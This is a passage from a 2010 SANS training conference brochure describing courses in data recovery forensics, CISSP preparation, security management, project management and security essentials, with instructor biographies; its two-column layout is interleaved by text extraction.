about the contents of the System Area and its tables such as P-Lists, G-Lists, Zone Tables, and Pass-
word tables. Now that you know how the data arrives at the heads as it passes though the pre-
amp, you will look at the content encoded in that sector and what each sector actually contains.
We will finish day two by formatting the drives, copying files to the drive for recovery, and then
breaking the drives down to bare metal before we reassemble and attempt to recover the data.
Topics: Hard Drive Heads Internals; Sector Examination; Reverse Imaging; Drive Rebuilding
Hosted Instructor Hands On – Part 3: Drive and Data Recovery Forensics*

Scott Moulton We now have the skills to physically repair drives and get them working again and need to deal
with the content, acquire the data, and repair any corruption that might have occurred. We
Scott Moulton is president of
begin the day looking at standard ways of imaging content. You’ll engage in several labs that
Forensic Strategy Services, LLC demonstrate how you can see and recover data from corrupt drives, which includes reviewing
and also owns a data recovery partition structures, including the GUID Partition Structure, recovering from NTFS when it won’t
mount. The labs will include the use of Disk Explorer for NTFS and its special qualities that
company called My Hard Drive make it a superb data recovery tool when used in parallel with GetDataBack for NTFS. We will
Died.com. Scott has been doing also review a NTFS drive using Testdisk.
computer forensics for almost Topics: Drive Acquisition; Corrupted NTFS Examination; Deepspar Disk Imager; Partition Structures
nine years. He began his career Hands On – Part 4: Drive and Data Recovery Forensics*
with a specialty in rebuilding We will spend the first half of the day finishing up logical structures of the top three operating
hard drives for investigative systems, followed by lecture and lab on assembling RAID 0 and RAID 5 arrays. First, we will
finish up Windows and NTFS with the unusual differences between Vista and XP with regard
purposes. Since that time he has
to data recovery. During these sections, we will discuss the nature of each operating system,
handled hard drives for many touching on its basic format and file structure. Labs will include HFSExplorer, where we can
court cases that have involved see the B* Tree structure stored in the Mac OSX Catalog. We will then move on to examining
the basic functions and software available to recover Linux EXT 2/3 and Reiser. The labs for
depositions and testifying, RAID 0 and RAID 5 will include several premade images, which we will process. You’ll see what
including a murder investigation. happens when you have the settings for RAID wrong, quick and easy ways to identify the
Recently Scott worked on an FBI problems, how to find the correct settings by doing entropy by sight or sound, and correcting
the issues so you can do a successful recovery.
case where he had to completely Topics: RAID Acquisition; Reconstruction and Examination; MAC OSX Partition Corruption and Repair;
reassemble a damaged hard Host Protected Areas
drive, successfully recovering

97% of the data. Throughout On day five we view information about Solid State Drives, what happens over time to data
his career, Scott has continued on solid state drives, and how the solid state drives function. We will cover the lower-level
functions that are different than a physical hard drive and research capturing dd images
to develop new methods and
of solid state drives at different times and what has happened to the data. You’ll
teach them to the public, publish learn about the future of storage and changes to hard drives, as well as flash media
videos on how to recover hard and introductory information about new technology called Domain Walls
or RaceTrack Memory. We’ll wind down by covering a few of the unique
drives and retrieve data long functions of the drive that may affect your ability to get an image such as
thought dead, and give presenta- TPM, hard drive passwords, flash updates to the drive, translator tables,
and secure erase wiping tools built into the motherboard and drive
Register at
tions on his processes and meth-
for high-speed wiping. www.sans.org/
odologies all over the United Topics: Solid State Drives; Flash Media Examination; Drive Encryption; network-security-2010
States. His material has been used Hard Drive Passwords; Drive Wiping
in courts around the world.

September 19 - 29, 2010 37
MANAGEMENT
414
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
Who Should Attend Bootcamp Sessions: 5:00pm - 7:00pm (Days 1-5) • 8:00am - 9:00am (Days 2-6)
• Security professionals who are
51 CPE Credits • Instructor: Eric Conrad
interested in understanding the
concepts covered in the CISSP®
exam as determined by (ISC)2 Over the past 4 years, 98% of all respondents who
• Managers who want to under- studied our SANS® +S™ Training Program for the CISSP®
stand the critical areas of network Certification Exam and then took the exam passed, compared
security
to a national average of around 70% for other prep courses.
• System, security, and network ad-
This is an accelerated review course that assumes the student has a basic
ministrators who want to under-
stand the pragmatic applications understanding of networks and operating systems and focuses solely on the
of the CISSP® 10 Domains 10 domains of knowledge as determined by (ISC)2:
• Security professionals and man- Domain 1 - Information Security Governance &
Risk Management Obtaining your CISSP®
agers looking for practical ways certification consists of:
the 10 domains of knowledge can Domain 2 - Access Controls
be applied to the current job • Fulfilling minimum requirements
Domain 3 - Cryptography
for professional work experience
• In short, if you desire a CISSP or Domain 4 - Physical (Environmental) Security
• Completing the Candidate
your job requires it, MGT414 is the Domain 5 - Security Architecture & Design Agreement
training for you
Domain 6 - Business Continuity & Disaster Recovery Planning • Periodic audit based on submission
Domain 7 - Telecommunications & Network Security of resume
Domain 8 - Application Security • Passing the CISSP® 250 multiple-
Domain 9 - Operations Security choice question exam with a scaled
score of 700 points or greater
Domain 10 - Legal, Regulations, Compliance & Investigations
• Submitting a properly completed
Each domain of knowledge is dissected into and executed Endorsement Form
its critical components. Every component is
discussed in terms of its relationship to other components and other areas
of network security. After completion of the course, the student will have a
good working knowledge of the 10 domains of knowledge and, with proper
preparation, be ready to take and pass the CISSP® exam.
AUTHOR STATEMENT
The CISSP® certification has been around
for almost 10 years and covers security
Note: The official (ISC)2
courseware and the CISSP®
B O O T C A M P
from a 30,000 foot view. CISSP® covers a
lot of theoretical information that is criti- exam are NOT provided as
cal for a security professional to under- part of the training. This session has extended hours.
stand. However, this material can be dry, Evening Bootcamp Sessions:
and since most students do not see the 5:00pm - 7:00pm days 1 - 5.
direct applicability to their jobs, they find Morning Bootcamp Sessions:
it boring. The goal of this course is to bring 8:00am - 9:00am days 2 - 6.
the CISSP®10 domains of knowledge to
life. By explaining important topics with
stories, examples, and case studies, the
practical workings of this information can
be discovered. I challenge you to attend
the SANS CISSP® training course and find
the exciting aspects of the 10 domains of
knowledge. -Eric Cole, PhD
SANS® +S™ Training Program for the CISSP® Certification Exam is an accelerated SANS
CISSP® review course that covers the security concepts required for the CISSP® exam and will get you up
to speed fast! This course is for students who have a basic understanding of networks and operating
systems and focuses solely on the 10 domains of knowledge as determined by (ISC)2.
414.1 Introduction and Information Security Governance &

Risk Management*
Learn the specific requirements needed to obtain various certifications as well as a CISSP®
certification. General security principles needed in order to understand the 10 domains of
knowledge are covered in detail with specific examples in each area. The first of 10 domains,
Information Security Governance & Risk Management, is discussed using real-world scenarios
to illustrate the critical points. Key concepts, including data classification, policies, and risk
management, are covered in detail.
Topics: Overview of Certification; Description of the 10 Domains: Introductory Material; Domain 1: Information
Security Governance & Risk Management
414.2 Access Controls and Cryptography*

Access controls covering AAA (authentication, authorization, and accountability) will be covered
with an emphasis on controlling access to critical systems. Cryptography plays a critical role
Certified Instructor in the protection of information. Examples showing the correct and incorrect ways to deploy
Eric Conrad cryptography and common mistakes made will be presented. The three types of crypto systems
are examined to show how they work together to accomplish the goals of crypto.
Eric Conrad’s career began Topics: Domain 2: Access Controls; Domain 3: Cryptography
in 1991 as a Unix sysadmin
414.3 Physical (Environmental) Security and Security
for a small oceanographic
Architecture and Design*
communications company. He If you do not have proper physical security, it doesn’t matter how good your network security
gained experience in a variety is; someone can still obtain access to sensitive information. In this section various aspects and
controls of physical security are discussed. A computer consists of both hardware and software.
of industries, including research, Understanding the components of the hardware, how they interoperate with each other
education, power, Internet, and and the software, is critical in order to implement proper security measures. We examine the
different hardware components and how they interact to make a functioning computer.
healthcare, and has worked with Topics: Domain 4: Physical (Environmental Security); Domain 5: Security Architecture and Design
companies such as Mitsubishi
414.4 Business Continuity & Disaster Recovery Planning and
Electric Research Labs, Boston
Telecommunications & Network Security*
University, The Open Group, Business continuity planning is examined, comparing the differences between BCP and DRP. A
Navipath, and Caritas Christi life cycle model for BCP/DRP is covered giving scenarios of how each step should be developed.
Understanding network communications is critical to building a solid foundation for network
Health Care. He is now an security. All aspects of network security will be examined to include routing, switches, key
independent information protocols, and how they can be properly protected on the network.
Topics: Domain 6: Business Continuity & Disaster Recovery Planning; Domain 7: Telecommunications & Network Security
security consultant focusing on
intrusion detection, incident 414.5 Applications Security and Operations Security*
In order to secure an application, it is important to understand system engineering principles
handling, and penetration
and techniques. Software development life cycles are examined, including examples of what
testing. In addition to the types of projects are suited for different life cycles. Non-technical aspects of security are just as
critical as technical aspects. Operations security focuses on the legal and managerial aspects of
CISSP, he holds the prestigious
security and covers components such as background checks and non-disclosure agreements,
GIAC Security Expert (GSE) which can eliminate problems from occurring down the road.
Topics: Domain 8: Applications Security; Domain 9: Operations Security
certification as well as the GIAC
GPEN, GCIH, GCIA, GCFA, GAWN, 414.6 Legal, Regulations, Compliance & Investigations,
and GSEC certifications. He is and Conclusions*
If you work in network security, understanding the law is critical during
a contributing author to SANS
incident responses and investigations. The common types of laws
HIPAA Security Implementation. are examined, showing how critical ethics are during any type of Register at
Eric also blogs about
investigation. The course finishes with showing how you put all of www.sans.org/
the 10 domains into practice to attain a secure enterprise.
information security at Topics: Domain 10: Legal, Regulations, Compliance & Investigations
www.ericconrad.com. *This course is available to Management 414 participants only.
September 19 - 29, 2010 39
MANAGEMENT
512
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010
Who Should Attend 9:00am - 6:00pm (Days 1-4) • 9:00am - 4:00pm (Day 5)
• This course is designed and 33 CPE Credits • Instructor: Stephen Northcutt
taught for mid-level to C-level
managers and leaders. It will give
you the ability to better manage This completely updated course is designed to empower
IT projects in a secure manner. advancing managers who want to get up to speed fast on
• Anyone with 8570 information information security issues and terminology. You don’t just
assurance management
responsibilities
learn about security; you learn how to manage security.
• Senior executives Lecture sections are intense; the most common student comment is that it’s
• Vice presidents like drinking from a fire hose. The diligent manager will learn vital, up-to-date
• Security or assurance officers and knowledge and skills required to supervise the security component of any
managers information technology project. Additionally, the course has been engineered
• Upwardly mobile managers to incorporate the NIST Special Papers 800 guidance so that it can be
particularly useful to US government managers and supporting contractors.
Essential topics covered in this management course include network

fundamentals and applications, power, cooling and safety, architectural
approaches to defense in depth, cyber attacks, vulnerability assessment and
management, security policies, contingency and continuity planning, awareness
management, risk management analysis, incident handling, Web application
security, offensive and defensive information warfare, culminating with our
management practicum.
The material uses Knowledge Compression™, special charts, and other

proprietary SANS techniques to help convey the key points of critical slides
and keep the information flow rate at a pace senior executives demand every
teaching hour of the course. Only SANS top instructors with management
experience are invited to teach this course, and you will be able to put what you
learn into practice the day you get back into the office.
AUTHOR STATEMENT
When SANS designed the Security
Leadership Essentials for Managers with Knowledge Compression™ uses Please note that some course material
Knowledge Compression™ course, we specialized material, in-class reviews, for SEC401 and MGT512 may overlap.
chose to emulate the format utilized by examinations, and test-taking training We recommend SEC401 for those
many executive MBA programs. While core to ensure that students have a solid interested in a more technical course of
source material is derived from our highly
understanding of the material that has study and MGT512 for those primarily
regarded SANS Security Essentials program, interested in a leadership-oriented but
we decided to focus this program on the big been presented to them.
less technical learning experience.
picture of securing the enterprise: network
fundamentals, security technologies, using
cryptography, defense in depth, policy
development, and management practicum.
Ultimately, the goal of this program is to
ensure that managers charged with the
responsibility for information security can
make informed choices and decisions that
will improve their organization’s security.
- Stephen Northcutt
Security Leaders and Managers earn the highest salaries (well over six figures) in information
security and are near the top of IT. Needless to say, to work at that compensation level, excellence is
demanded. These days, security managers are expected to have domain expertise as well as the classic
project management, risk assessment, and policy review and development skills.
512.1 Managing the Plant, Network, and Information

Architecture*
The course starts with a whirlwind tour of the information an effective IT
security manager must know to function in today’s environment. We will
cover safety, physical security, and how networks and the related protocols, like
TCP/IP, work and equip you to review network designs for performance, security,
vulnerability scanning, and return on investment. You will learn more about
secure IT operations in a single day than you ever thought possible.
Topics: Budget Awareness and Project Management; The Network Infrastructure; Computer and Network
Addressing; IP Terminology and Concepts; Vulnerability Management; Managing Physical Safety,
Security & the Procurement Process
SANS Faculty Fellow 512.2 Defense In Depth*

Stephen Northcutt Learn information assurance foundations, which are presented in the context of
both current and historical computer security threats, and how they have impacted
Stephen Northcutt founded the
confidentiality, integrity, and availability. You will learn the methods of attack and the
GIAC certification and currently importance of managing attack surface.
serves as president of the SANS Topics: Attacks Against the Enterprise; Defense in Depth; Managing Security Policy;
Access Control and Password Management
Technology Institute, a post-
graduate level IT security college
512.3 Secure Communications*
(www.sans.edu). Stephen, a
Examine various cryptographic tools and technologies and how they can be used to
graduate of Mary Washington secure a company’s assets. A related area called steganography, or information hiding,
College, is author/coauthor of four is also covered. Learn how malware and viruses often employ cryptographic techniques
books, including Inside Network in an attempt to evade detection. We will learn about managing privacy issues in
communications and investigate Web application security.
Perimeter Security 2nd Edition and
Topics: Cryptography; Wireless Network Security; Steganography; Managing Privacy; Web Communications and
IT Ethics Handbook. Since 2007 Security; Operations Security, Defensive and Offensive Methods
Stephen has conducted over 34
in-depth interviews with leaders 512.4 The Value of Information*
in the security industry to research On this day, we consider the most valuable resource an organization has – its
information. You will learn about intellectual property, incident handling, and to
the competencies required to be a identify and better protect the information that is the real value of your organization.
successful leader. He maintains the We will then formally consider how to apply everything we have learned as well as
SANS Leadership Laboratory, where practice briefing management on our risk architecture.
research on these competencies is Topics: Managing Intellectual Property; Incident Handling Foundations; Information Warfare; Disaster Recovery/
Contingency Planning; Managing Ethics; IT Risk Management
posted and is lead author for Execu-
bytes, a monthly newsletter for 512.5 Management Practicum*
security managers. Stephen is the In the fifth and final day, we pull it all together and apply the technical knowledge
lead author/instructor for MGT421: to the art of management. The management practicum covers a number of specific
applications and topics concerning information security. We’ll explore proven
SANS Leadership and Management
techniques for successful and effective management, empowering you to
Competencies, as well as MGT512: immediately apply what you have learned your first day back at the office.
SANS Security Leadership Essentials Topics: The Mission; Globalization; IT Business and Program Growth; Security and Organizational
Structure; The Total Cost of Ownership; Negotiations; Fraud; Legal Liability; Technical
for Managers, a prep course for People
the GSLC certification that meets
*This course is available to Management 512 participants only.
Register at
all levels of requirements for DoD
www.sans.org/
Security Managers per DoD 8570. network-security-2010
Stephen also blogs at https://blogs.
sans.org/security-leadership.
September 19 - 29, 2010 41
MANAGEMENT
525
• Security professionals who are 36 CPE Credits • Instructor: Jeff Frisk
interested in understanding the
concepts of project management
Designed to give you the knowledge and tools you
• Managers who want to
understand the critical areas of need to become a top-notch project manager, this
making projects successful course focuses on effective communication, human
• Individuals working with time, resources, and quality management.
cost, quality, and risk sensitive
projects and applications Throughout the week, we will cover all aspects of project management
• Security professionals and from initiating and planning projects through managing cost, time, and
managers who would like to quality while your project is active to completing, closing, and documenting
utilize effective communication as your project finishes. This course follows the basic project management
techniques and proven methods
structure from the Project Management Institute’s Guide to the Project
to relate better to people
Management Body of Knowledge (PMBOK® Guide) and also offers specific
• Individuals interested in prepar-
ing for Project Management insight and techniques to help you get the job done. You will leave this course
Institute’s – Project Management with specific tools that can be utilized immediately in your work environment.
Professional (PMP®) Exam A copy of the Guide (Fourth Edition) is provided to all participants. You can
reference the PMBOK® Guide and use your course material along with the
knowledge you gain in class to solidify your preparation for the updated
Project Management Professional (PMP®) Exam and the GIAC Certified Project
Manager Exam.
The project management process is broken down into core process groups
that can be applied across multiple areas of any project. This course covers
cost, time, quality, and risk management, but not only from the point of view of
projects that create final products. Keeping in line with prevalent needs from
the InfoSec industry, we look at projects that create and maintain services and
cover in depth how cost, time, quality, and risk affect IT security and the services
AUTHOR STATEMENT we provide to others both inside and outside of our organizational boundar-
Managing projects to completion, with ies. We go into great detail covering human resource management as well as
an alert eye on quality, cost, and time, is effective communication and conflict resolution. People are the most valuable
something most of us need to do on an
resource we have on a project, and the communication and conflict resolution
ongoing basis. In this course, we break
down project management into its funda- techniques presented can be used in all areas of professional work. Above all,
mental components and work to galvanize projects fail or succeed because of the people involved. You want to make sure
your understanding of the key concepts the people involved with the development and execution of your project build
with an emphasis on practical application
a strong team and communicate effectively.
and execution. Since project managers
PMBOK® and PMP® are registered trademarks of the Project Management Institute.
spend the vast majority of their time
communicating with others, we focus on
traits and techniques that enable effective
communication. As people are the most “This course will provide
critical asset in the project management a wealth of information
process, effective and thorough communi-
to advance my career
cation is essential.
-Jeff Frisk in the IT field.”
-DOREEN LAWRENCE,
42 SANS Network Security 2010 GIAC Certification STI Masters Program
September 19 - 29, 2010 LOS ALAMOS NATIONAL LAB www.giac.org www.sans.edu
Project Management and Effective Communications for Security Professionals and
Managers will help you hone your communication skills and enable you to succeed in managing
projects where quality, cost, and time are driving factors.
525.1 Project Management Structure & Framework*

This course offers insight and specific techniques that both beginner and experienced project manag-
ers can utilize. The structure and framework section lays out the basic architecture and organization of
project management. We will cover the common project management group processes, the difference
between projects and operations, project life cycles, and managing project stakeholders.
Topics: Definition of Terms and Process Concepts; Group Processes; Project Life Cycle;
Types of Organizations; PDCA Cycle
525.2 Project Charter and Scope Management*

During day two, we will go over techniques used to develop the project charter and formally
initiate a project. The scope portion defines the important input parameters of project management
and gives you the tools to ensure that from the onset your project is well defined. We cover tools and
techniques that will help you define your project’s deliverables and develop milestones to gauge
performance and manage change requests.
Topics: Formally Initiating Projects; Project Charters; Project Scope Development; Work Breakdown Structures; Scope Verification
and Control
Certified Instructor
Jeff Frisk 525.3 Time and Cost Management*
Our third day details the time and cost aspects of managing a project. We will cover the importance
Jeff holds the PMP and of correctly defining project activities, project activity sequence, and resource constraints. We will use
GSEC credentials and milestones to set project timelines and task dependencies along with learning methods of resource
allocation and scheduling. We introduce the difference between resource and product related costs and
currently serves as the go into detail on estimating, budgeting, and controlling costs. You will learn techniques for estimating
director of the GIAC project cost and rates as well as budgeting and the process for developing a project cost baseline.
Topics: Process Flow; Task Lead and Lag Dependencies; Resource Breakdown Structures; Task Duration Estimating; Critical Path
program. He has worked Scheduling; Cost Estimating Tools; Cost vs. Quality; Cost Base Lining; Earned Value Analysis and Forecasting
on many projects for
SANS and GIAC, including
525.4 Communications and Human Resources*
During day four, we cover methods for identifying, acquiring, developing, and managing your project
courseware, certification, team. Performance appraisal tools are offered as well as conflict management techniques. You will
and exam development. learn management methods to help keep people motivated and provide great leadership. The effective
communication portion of the day covers identifying and developing key interpersonal skills. We
Jeff has an engineering cover organizational communication and the different levels of communication as well as common
degree from The Rochester communication barriers and tools to overcome these barriers.
Topics: Acquiring and Developing Your Project Team; Organizational Dependencies and Charts; Roles and Responsibilities; Team
Institute of Technology Building; Conflict Management; Interpersonal Communication Skills; Communication Models and Effective Listening
and more than 15 years
525.5 Quality and Risk Management*
of IT project manage- On day five, you will become familiar with quality planning, quality assurance, and quality control
ment experience with methodologies as well as learning the cost of quality concept and its parameters. We define quality
metrics and cover tools for establishing and benchmarking quality control programs. We go into quality
computer systems, high- assurance and auditing as well as using and understanding quality control charts. The risk section goes
tech consumer products, over known versus unknown risks and how to identify, assess, and categorize risk. We use quantitative
and business development risk analysis and modeling techniques so that you can fully understand how specific risks affect your
project. You will learn ways to plan for and mitigate risk by reducing your exposure as well as how to take
initiatives. Jeff has held advantage of risks that could have a positive effect on your project.
various positions, including Topics: Cost of Quality; Quality Metrics; Continual Process Improvement; Quality Baselines; Quality Control; Change Control; Risk
Identification; Risk Assessment; Time and Cost Risks; Risk Probability and Impact Matrices; Risk Modeling and Response
managing operations,
product development, elec- 525.6 Procurement and Project Integration*
We close out the week with the procurement aspects of project management and then integrate all
tronic systems/computer of the concepts presented into a solid, broad-reaching approach. We cover contract basics and
engineering. He has many different types of contracts and then the make versus buy decision process. We go over ways to
initiate strong request for quotations (RFQ) and develop evaluation criteria, then qualify and
years of international and select the best partners for your project. The final session integrates everything we have
high-tech business experi- learned by bringing all the topics together with the common process groups. Using
ence working with both detailed project management methodology, we learn how to finalize the project
management plan and then execute and monitor the progress of your project to Register at
big and small companies to ensure success. www.sans.org/
develop computer hard- Topics: Contract Types; Make vs. Buy Analysis; Vendor Weighting Systems; Contract
Negotiations; Project Execution; Monitoring Your Projects Progress; Finalizing network-security-2010
ware and software products Deliverables; Forecasting and Integrated Change Control
and services. *This course is available to Management 525 participants only.

September 19 - 29, 2010 43
SECURITY
401
Who Should Attend 46 CPE Credits • Evening Bootcamp Sessions: 5:15pm - 7:00pm
• Security professionals who Laptop Required • Instructor: Eric Cole, PhD
want to fill the gaps in their
understanding of technical
information security Maximize your training time and turbo-charge
• Managers who want to your career in security by learning the full SANS
understand information security Security Essentials curriculum needed to qualify for
beyond simple terminology and the GSEC certification.
concepts
SANS Security Essentials is designed to give anyone interested in network
• Anyone new to information
security with some background security the skills required to be an effective player in this arena. This in-depth,
in information systems and comprehensive course provides the essential, up-to-the-minute knowledge and
networking skills required for securing systems and organizations, and equips you with the
language and theory of computer security. Learn all of this and more from the
best security instructors in the industry.
B O O T C A M P
Security 401 PARTICIPANTS ONLY

5:15pm - 7:00pm - Required — Course Days 1-5
Attendance is required for the evening bootcamp sessions as the information
presented appears on the GIAC exams. These daily bootcamps give you the
opportunity to apply the knowledge gained throughout the course in an instructor-
led environment. It helps fill your toolbox with valuable tools you can use to solve
problems when you go back to work. The material covered is based on Dr. Eric
This course is endorsed by
Cole’s “cookbook for geeks,” and most students find it to be one of the highlights
the Committee on National
of their Security Essentials experience! Students will have the opportunity to install,
Security Systems (CNSS) NSTISSI
4013 Standard for Systems configure, and use the tools and techniques they have learned. CDs containing the
Administrators in Information software required will be provided for each student. Students should arrive with
Systems Security (INFOSEC). a laptop properly configured. A working knowledge of each operating system is
recommended but not required. For students who do not wish to build a dual boot
machine, SANS will provide a bootable Linux CD for the Linux exercises.
AUTHOR STATEMENT
One of the things I love to hear from
students after teaching Security 401 is, “I Please note that some course material for SEC401 and MGT512 may overlap.
have worked in security for many years, We recommend SEC401 for those interested in a more technical course of study
and after taking this course I realized how and MGT512 for those primarily interested in a leadership-oriented but less
much I did not know.” With the latest ver- technical learning experience.
sion of SANS Security Essentials Bootcamp
Style, we have really captured the critical
aspects of security and enhanced those
topics with examples to drive home the
key points. After attending this course,
I am confident you will walk away with
solutions to problems you have had for a
while plus solutions to problems you did
not even know you had. -Eric Cole, PhD
44 SANS Network Security 2010 GIAC Certification DoD 8570 Required STI Masters Program Cyber Guardian Program
September 19 - 29, 2010 www.giac.org www.sans.org/8570 www.sans.edu www.sans.org/cyber-guardian
Security Essentials is our most popular training program. We strongly recommend you attend
the evening bootcamp sessions with hands-on exercises. These require the dedication to really
put in the hours, but they can help you fill in the gaps in your information security knowledge.
Everyone, except truly seasoned hands-on information security workers, can benefit from SANS
Security Essentials Bootcamp Style. A GSEC Certification can add 6-9% to your bottom line salary.
401.1 Hands On: Networking Concepts

Day one teaches you how networks, routers, firewalls, and the related protocols
like TCP/IP work so you’ll be better prepared to determine hostile traffic and have
a foundation for the succeeding days’ training.
Topics: Network Fundamentals; IP Concepts; IP Behavior, IOS and Router Filters; and Physical Security;
Bootcamp
401.2 Hands On: Defense In Depth

Day two covers security threats and their impact, including information warfare. It
also covers sound security policies and password management tools, the six steps
SANS Faculty Fellow of incident handling, and Web server security testing.
Eric Cole, PhD Topics: Defense in Depth; Security Policy and Contingency Planning; Access Control and Password
Dr. Eric Cole is an industry-recognized Management; Incident Response; Information Warfare; Web Communications and Security; Bootcamp
security expert with over 15 years of

hands-on experience. Cole currently 401.3 Hands On: Internet Security Technologies
performs leading-edge security Day three gives you a roadmap that will help you understand the tools and
consulting and works in research and options available for deploying systems for defense.
Topics: Attack Strategies and Mitigation; Vulnerability Scanning; Intrusion Detection Technologies; Intrusion
development to advance the state of Prevention Technologies; IT Risk Management; Bootcamp
the art in information systems security.
Cole has experience in information 401.4 Hands On: Secure Communications
technology with a focus on perim-
Day four covers encryption, wireless security, and operations security.
eter defense, secure network design, Topics: Encryption 101; Encryption 102; Applying Cryptography; Wireless Network Security; VoIP; Operations
vulnerability discovery, penetra- Security; Bootcamp
tion testing, and intrusion detection

systems. Cole has a master’s degree in 401.5 Hands On: Windows Security
computer science from NYIT and a PhD Day five is all about securing the current batch of Windows operating systems
from Pace University with a concentra- (Windows XP/2003/Vista/2008/Windows 7) and teaches the tools that simplify
tion in information security. Dr. Cole is and automate the process.
Topics: Windows Security Infrastructure; Permissions and User Rights; Security Templates and Group Policy;
the author of several books, including Service Packs, Hotfixes, and Backups; Securing Windows Network Services; Automation and Auditing;
Hackers Beware, Hiding in Plain Site, Bootcamp
Network Security Bible, and Insider

Threat. He is the inventor of over 20 401.6 Hands On: Linux Security
patents and is a researcher, writer, and Based on industry consensus standards, this course provides step-by-step
speaker. He is also a member of the guidance on improving the security of any Linux system. The course combines
Commission on Cyber Security for the practical how-to instructions with background information for Linux beginners
and security advice and “best practices” for administrators of all levels of
44th President and several executive
expertise.
advisory boards. Dr. Cole is also the
Topics: Linux Landscape; Linux Command Line; Linux OS Security; Linux Security Tools;
CTO of the Americas for McAfee. Cole Maintenance, Monitoring and Auditing Linux
is actively involved with the SANS

Technology Institute (STI) and SANS
“One of the top instructors I have had. Register at
working with students, teaching, and
Keeping me in a room for 12 hours and www.sans.org/
maintaining and developing course-
holding my attention is impressive.” network-security-2010
ware. He is a SANS faculty fellow and
course author. -ANDREW FISHER, USAF SANS Network Security 2010
September 19 - 29, 2010 45
SECURITY
501
• Students who have taken Security 36 CPE Credits • Laptop Required • Instructor: James Tarala
Essentials and want a more
advanced 500-level course similar
to SEC401 Cyber security will continue to increase in
• People who have foundational knowledge importance as attacks become stealthier, have
covered in SEC401, do not want to take a a greater financial impact on an organization, and
specialized 500-level course, and still want cause reputational damage.
a broad advanced coverage of the core
areas to protect their systems While Security Essentials lays a solid foundation for the security
• Anyone looking for detailed technical practitioner, there is only so much that can be packed into a six-day
knowledge on how to protect against, course. SEC501 is a follow up to SEC401: SANS Security Essentials
detect, and react to the new threats (with no overlap) and continues to focus on more technical areas
that will continue to cause harm to an needed to protect an organization. The course focus is on:
organization
Prevention - configuring a system or network correctly
Detection - identifying that a breach has occurred at the system or
network level
Reaction - responding to an incident and moving to evidence
collection/forensics
Prevention is ideal, but detection is a must. We have to ensure
that we constantly improve security to prevent as many attacks
as possible. This prevention/ protection occurs externally and
internally. Attacks will continue to pose a threat to an organization
as data becomes more portable and networks continue to be porous.
Therefore a key focus needs to be on data protection – securing
AUTHOR STATEMENT
our critical information whether it resides on a server, in a robust
It is always a thrill after I finish teaching SEC401 to
see students leave with a fire in their eyes and an network architecture, or on a portable device.
excitement about them. They walked into class feeling Despite our best effort at preventing attacks and protecting critical
overwhelmed that security is a lost cause, but they
data, some attacks will still be successful. Therefore we need to be
leave class understanding what they need to do and
have a focus and drive to do the right thing to secure able to detect attacks in a timely fashion. This is accomplished by
their organizations. However the next question we understanding the traffic flowing on your networks and looking
receive on a constant basis is, what course should I take for indication of an attack. It also includes performing penetration
next? How do I continue my journey? Well, it depends testing and vulnerability analysis against an organization to identify
on what your focus area is. Do you want to get more problems and issues before a compromise occurs.
into perimeter protection, IDS, operating system
security, etc? The challenge is that many students have Finally, once an attack has been detected, we must react in a timely
positions that do not allow them to focus on one area fashion and perform forensics. By understanding how the attacker
– they need to understand all of the key areas across broke in, this can be fed back into more effective and robust
security. What students are telling us is that they want preventive and detective measures, completing the security lifecycle.
a Security Essentials part 2 or a 500-level continuation
of Security Essentials covering the next level of techni-
cal knowledge. In Security 501, SANS has decided to
give students just what they have been asking for, and “Really enjoyed all of the
I am beyond thrilled with the results. We have identi-
fied core foundation areas that complement SEC401
hands-on work. Real life scenarios
with no overlap and continue to build a solid security are always good.”
foundation for network practitioners. -Eric Cole, PhD -ERIC LUELLEN, MURRAY STATE
46 SANS Network Security 2010 GIAC Certification

September 19 - 29, 2010 www.giac.org
“This was a great class. The instructor had great
high energy and kept things moving!”
-MICHELLE HERD, UNIVERSITY OF DENVER
501.1 Hands On: Defensive Network Infrastructure

Protecting a network from attack starts with designing, building, and implementing a robust
network infrastructure. Many aspects to implementing a defense-in-depth network are often
overlooked since companies focus on functionality. Achieving the proper balance between
business drivers and core protection of information is difficult. On the first day students will learn
how to design and implement a functionality-rich, secure network and how to maintain and
update it as the threat landscape evolves.
Topics: Introducing Network Infrastructure as Targets for Attack; Implementing the Cisco Gold Standard to
Improve Security; Advanced Layer 2 and 3 Controls
501.2 Hands On: Packet Analysis

Packet analysis and intrusion detection are at the core of timely detection. Detecting attacks
is becoming more difficult as attacks become stealthier and more difficult to find. Only by
understanding the core principles of traffic analysis can one become a skilled analyst and
distinguish normal traffic from attack traffic. Security professionals must be able to detect new,
advanced zero-day attacks before they compromise a network. Prevention, detection, and
reaction must all be closely knit so that once an attack is detected, defensive measures can be
adapted, proactive forensics implemented, and the organization continue to operate.
Senior Instructor
Topics: Architecture Design & Preparing Filters; Detection Techniques and Measures; Advanced IP Packet Analysis;
James Tarala Intrusion Detection Tools
James Tarala is a principal
501.3 Hands On: Pentest
consultant with Enclave Hosting, An organization must understand the changing threat landscape and compare that against its
LLC and is based out of Venice, own vulnerabilities. On day three students will understand the variety of tests that can be run
and how to perform penetration testing in an effective manner. Students will learn about exter-
Florida. He is a regular speaker and nal and internal pen testing and the methods of black, gray, and white box testing. Penetration
senior instructor with the SANS testing is critical to identify an organization’s exposure points, but students will also learn how to
prioritize and fix these vulnerabilities to increase the overall security of an organization.
Institute as well as a courseware Topics: Variety of Penetration Testing Methods; Vulnerability Analysis; Key Tools and Techniques; Basic Pen Testing;
author and editor for many SANS Advanced Pen Testing
auditing and security courses. 501.4 Hands On: First Responder

As a consultant, he has spent Any organization connected to the Internet or with employees is going to have attacks launched
the past few years architecting against it. Security professionals need to understand how to perform incident response, analyze
what is occurring, and restore their organization back to a normal state as soon as possible. Day
large enterprise IT security and four will equip students with a proven six-step process to follow in response to an attack - pre-
infrastructure, specifically working pare, identify, contain, eradicate, recover, and learn from previous incidents. Students will learn
how to perform forensic investigation and find indication of an attack. This information will be
with many Microsoft-based fed into the incident response process and ensure the attack is prevented from occurring again
directory services, e-mail, terminal in the future.
Topics: Incident Handling Process and Analysis; Forensics and Incident Response
services, and wireless technologies.
He has also spent a large amount of 501.5 Hands On: Malware
As security professionals continue to build more proactive security measures, attackers’ methods
time consulting with organizations
will continue to evolve. A common way for attackers to target, control, and break into as
to assist them in their security many systems as possible is through the use of malware. Therefore it is critical that students
understand what type of malware is currently available to attackers and future trends and
management, operational practices,
methods of exploiting systems. With this knowledge students can then learn how to analyze,
and regulatory compliance issues defend, and detect malware on systems and minimize the impact to the organization.
